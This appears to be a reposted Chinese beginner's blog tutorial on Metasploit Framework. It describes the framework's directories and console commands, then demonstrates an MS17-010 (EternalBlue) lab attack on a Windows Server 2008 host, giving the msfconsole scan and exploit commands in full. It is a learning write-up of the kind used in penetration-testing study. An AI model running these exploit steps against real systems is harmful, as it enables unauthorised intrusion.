博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
Metasploit Framewok的简单使用
阅读量:3960 次
发布时间:2019-05-24

本文共 2014 字,大约阅读时间需要 6 分钟。

介绍

几乎每一个玩渗透的人都会接触到metasploit framework,简称msf。这是一个渗透测试框架,用ruby语言写的,该框架集成了很多可用的exploit,比如著名的ms08_067等。你可以在这个框架下进行一系列的渗透测试,利用现有的payload,如meterpreter等进一步拿取对方的shell

metasploit模块功能介绍

config --metasploit的环境配置信息,数据库配置信息data--后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息db--rails编译生成msf的web框架时的数据库信息documentation--用户说明文档及开发文档external--metasploit的一些基础扩展模块libs--metasploit的一些基础类和第三方模块类log--msf运行时的一些系统信息和其他信息modules--metasploit的系统工具模块,包括预辅助模块(auxiliary),渗透模块(exploits),攻击荷载(payloads)和后渗透模块(posts),以及空字段模块(nops)和编码模块(Encoders)msfbinscan--对bin文件进行文件偏移地址扫描msfcli--metasploit命令行模式,可以快速调用有效的payload进行攻击,新版本的metasploit即将在2015年6月18日弃用msfconsole--metasploit的基本命令行,集成了各种功能。msfd--metasploit服务,非持久性服务msfelfscan--对linux的elf文件偏移地址进行扫描msfencode--metasploit的编码模块,可以对mepayload和shellcode进行编码输出msfpayload--metasploit攻击荷载,用以调用不同的攻击荷载,生成和输出不同格式的shellocode,新版本的metasploit即将在2015年6月18日弃用,用msfvenmon替代。msfmachscan--功能同msfelfscanmsfpescan--对windows的pe格式文件偏移地址进行扫描msfrop--对windows的pe进行文件地址偏移操作,可以绕过alsr等msfrpc--metasploit的服务端,非持久性的rpc服务msfrpcd--持久性的metasploit本地服务,可以给远程用户提供rpc服务以及其他的http服务,可以通过xml进行数据传输。msfupdate--metasploit更新模块,可以用来更新metasploit模块msfvenom--集成了msfpayload和msfencode的功能,效率更高,即将替代msf payload和msfencodeplugins--metasploit的第三方插件接口scripts--metasplit的常用后渗透模块,区别于data里的后渗透模块,不需要加post参数和绝对路径,可以直接运行test--metasploit的基本测试目录tools--额外的小工具和第三方脚本工具

在这里插入图片描述

基本的控制台命令使用

banner

查看metasploit的基本信息
在这里插入图片描述connect

这里理解成kali的nc命令,基本一致

在这里插入图片描述在这里插入图片描述
show

列出各种各样的模块,后边会经常使用

search

搜索模块和漏洞的名称,可以进行模糊匹配

在这里插入图片描述

测试

这里我以ms17_010漏洞(也就是著名的永恒之蓝)来演示Metasploit Framewok的简单使用方法

实验环境:

攻击机: kali
被攻击的计算机:windows server 2008
我看到网上说要进行这个实验要把被攻击的计算机的防火墙关掉,我试了一下,发现关不关都能成功,也不知道为什么。知道的可以给博主留下一下言。

扫描漏洞

msf >use auxiliary/scanner/smb/smb_ms17_010(加载扫描exp)

msf >set RHOSTS 192.168.11.160(设置被扫描IP)
msf >run(进行扫描,观察是否存在该漏洞)

这里表示存在此漏洞,可以进行攻击

在这里插入图片描述

漏洞攻击

msf5> use exploit/windows/smb/ms17_010_eternalblue (使用攻击模块)

msf5> set RHOSTS 192.168.11.160 (设置目标 ip)
msf5> run(开始攻击)

在这里插入图片描述在这里插入图片描述其中一些常用的命令:

show options 查看当前模块的选项
在这里插入图片描述
show targets 显示存在该漏洞的操作系统
在这里插入图片描述
从这里我们可以看出存在这个漏洞的操作系统是windows 7和windows server 2008

最后

作为一个刚开始学Metasploit Framewok的小菜鸡,还有很长的路要走啊。。。

转载地址:http://zyhzi.baihongyu.com/

你可能感兴趣的文章
智能设计 | MixAI 知识库 No.69
查看>>
通过研究微信文章的相关推荐逻辑 ,尝试生成指南| Mixlab设计黑客
查看>>
浏览器低成本实现免手提的用户体验,使用人脸、手势、姿态追踪 | Mix群聊
查看>>
这个世界上肯定有另一个我,做着我不敢做的事,过着我想过的生活 | MixAI 知识库 No.70...
查看>>
表情包数据挖掘 | Mix群聊
查看>>
如何阅读科研论文
查看>>
理解本真的REST架构风格
查看>>
10款免费且开源的项目管理工具
查看>>
java调用javascript :js引擎rhino
查看>>
asp 中常用的文件处理函数
查看>>
ADO中sqlserver存储过程使用
查看>>
Linux KernelTech版FAQ 1.0
查看>>
ntfs分区iis故障的解决
查看>>
个人创业“六大死穴”
查看>>
最重要的 12个 J2EE 最佳实践
查看>>
通过Java Swing看透MVC设计模式
查看>>
Java 理论与实践: 关于异常的争论
查看>>
编写高效的线程安全类
查看>>
提高Java代码可重用性的三个措施
查看>>
编写跨平台Java程序注意事项
查看>>